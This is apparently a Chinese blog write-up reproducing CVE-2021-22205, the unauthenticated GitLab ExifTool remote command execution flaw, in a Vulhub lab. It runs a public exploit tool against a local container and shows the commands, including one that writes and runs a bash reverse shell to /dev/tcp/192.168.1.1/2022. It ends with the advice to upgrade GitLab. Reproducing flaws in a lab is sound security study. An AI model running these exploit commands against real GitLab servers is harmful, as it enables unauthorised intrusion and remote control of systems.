CVE-2021-22205 Gitlab exiftool远程命令执行 复现
1 漏洞信息
漏洞名称 | Gitlab exiftool远程命令执行漏洞 |
---|---|
漏洞编号 | CVE-2021-22205 |
危害等级 | 高危 |
CVSS评分 | 7.5 |
漏洞类型 | 中间件漏洞 |
漏洞厂商 | GitLab |
漏洞组件 | Gitlab exiftool |
受影响版本 |
11.9 <= GitLab(CE/EE)< 13.8.8 13.9 <= GitLab(CE/EE)< 13.9.6 13.10 <= GitLab(CE/EE)< 13.10.3 |
漏洞概述 | 由于Gitlab某些端点路径无需授权,攻击者可在无需认证的情况下完成图片上传,从而执行任意命令。 |
2 环境搭建
2.1 环境概述
- Linux操作系统(Vulhub)
2.2 搭建过程
加入到漏洞目录下拉取漏洞
cd vulhub/gitlab/CVE-2021-22205
docker-compose up -d
{width=“5.761111111111111in”
height=“0.6458333333333334in”}
访问漏洞urlhttp://192.168.1.136:8080/users/sign_in
{width=“5.759722222222222in”
height=“2.2708333333333335in”}
3 漏洞复现
直接使用工具进行利用,下载地址https://github.com/Al1ex/CVE-2021-22205
CVE-2021-22205.py -h
{width=“5.761805555555555in”
height=“3.7881944444444446in”}
验证下,发现存在漏洞
CVE-2021-22205.py -t http://192.168.1.136:8080 -v true
{width=“5.756944444444445in”
height=“2.298611111111111in”}
创建目录,来判断是否能够执行命令
CVE-2021-22205.py -t http://192.168.1.136:8080 -a true -c "touch /tmp/success-2022-07"
{width=“5.761805555555555in”
height=“1.7493055555555554in”}
可以发现创建成功了
docker ps 查看容器id
docker exec -it 84(容器id) /bin/bash
cd /tmp
ls
{width=“5.761805555555555in”
height=“0.7847222222222222in”}
既然可以创建文件,那么我们可以创建执行反弹shell脚本、并且添加执行权限和运行该脚本的命令。
CVE-2021-22205.py -t http://192.168.1.136:8080 -a true -c "echo 'bash -i >& /dev/tcp/192.168.1.1/2022 0>&1' > /tmp/shell.sh && chmod +x /tmp/shell.sh && /bin/bash /tmp/shell.sh"
{width=“5.759722222222222in”
height=“1.5840277777777778in”}
成功反弹了shell
{width=“5.759027777777778in”
height=“1.5347222222222223in”}
4 修复建议
1、升级Gitlab至最新版本
CVE-2021-22205 Gitlab exiftool远程命令执行 复现相关推荐
- 【安全通告】创宇安全智脑:GitLab ExifTool远程命令执行漏洞在野利用(CVE-2021-22205)...
- Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权
Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...
- GoAhead远程命令执行漏洞(CVE-2021-42342)
GoAhead远程命令执行漏洞(CVE-2021-42342) 目录 GoAhead远程命令执行漏洞(CVE-2021-42342) 漏洞描述 漏洞复现 启动环境 复现漏洞 漏洞描述 漏洞主要是由于上 ...
- 开源堡垒机JumpServer远程命令执行漏洞复现
声明 好好学习,天天向上 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统.JumpServer 使用Python ...
- Hadoop Yarn RPC远程命令执行
影响范围 Hadoop Yarn RPC 漏洞类型 远程命令执行 利用条件 可未授权访问 漏洞概述 2021年11月15日,有安全研究人员披露Hadoop Yarn RPC存在未授权访问漏洞,此漏洞存 ...
- 代码审计-dubbo admin =2.6.1远程命令执行漏洞
前置 输入材料 安全目标和需求 架构分析 供应链安全 源代码审查 依赖结构矩阵(Dependency Structure Matrices,DSM) 数据流 信任边界 数据存贮 威胁列表 otter ...
- SonicWall 远程命令执行漏洞
SonicWall SSL-VPN 远程命令执行漏洞 漏洞描述 SonicWall SSL-VPN 远程命令执行在1月24日被公开 EXP,此设备存在远程命令执行漏洞 漏洞影响 SonicWall S ...
- flexpaper php 代码,FlexPaper 2.3.6 远程命令执行漏洞 附Exp
影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...
- ssh升级后+sftp+java_java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行(改进)...
我写过一篇java中使用JSCH包,SFTP及SSH2文件操作及远程命令执行,现在想来,觉得调用方式太过于绕,不符合我写程序的风格,所以进行了改进. 参数类,用于配置连接的参数,SshConfigur ...
最新文章
- debian 9/ ubuntu 添加swap分区
- kalinux实现自适用全屏、与物理主机共享文件方法
- Java try和catch的使用
- asp.net中的MD5加密
- java第一句_Java如何开始第一个项目?
- 第二十四章 异常和错误处理 1异常
- 非线性系统【三】LaSalle不变原理
- k3 cloud api java_调用K3Cloud webapi
- vax_patch.exe谁有这个文件,可以免费分享一下嘛?
- Ventoy+WePE 装机教程
- 联想IBM笔记本驱动
- iphone和android照片传输,iPhone与安卓跨平台如何传照片图文教程
- U8C报表模板已设置,任务已分配仍无法查看报表数据
- 保利威视教程:什么是HLS?
- 人工智能导论(数据挖掘)
- 仿微信朋友圈拍照上传
- 图片按比例缩放,鼠标滚轮调整大小
- ORACLE中分钟用mm和mi 标示区别
- Linux之git用法
- tp5.1 乐视云上传视频文件(https请求http乐视云上传接口)http网址下上传视频(https API接口)
热门文章
- 推荐一个免费的生成词云(word cloud)的在线工具
- 使用VSCode插件CodeRunner一键编译运行Java
- java初始化含十个数的数组_java初始化数组的方法
- 06年及以前韩国星际职业联赛及选手资料
- Jetson NX Ubuntu 18.04下谷歌输入法候选框不显示解决办法
- 计算机系统相关(嵌入式)
- 在vs中char类型的实参与LPCWSTR类型的形参类型不兼容怎么解决?
- 帧中继环境中NBMA模式下OSPF的配置
- OSPF的NBMA环境建立邻居及排错,理论+实战讲解,干货分享
- matlab用到两个工具箱有重复函数文件处理方法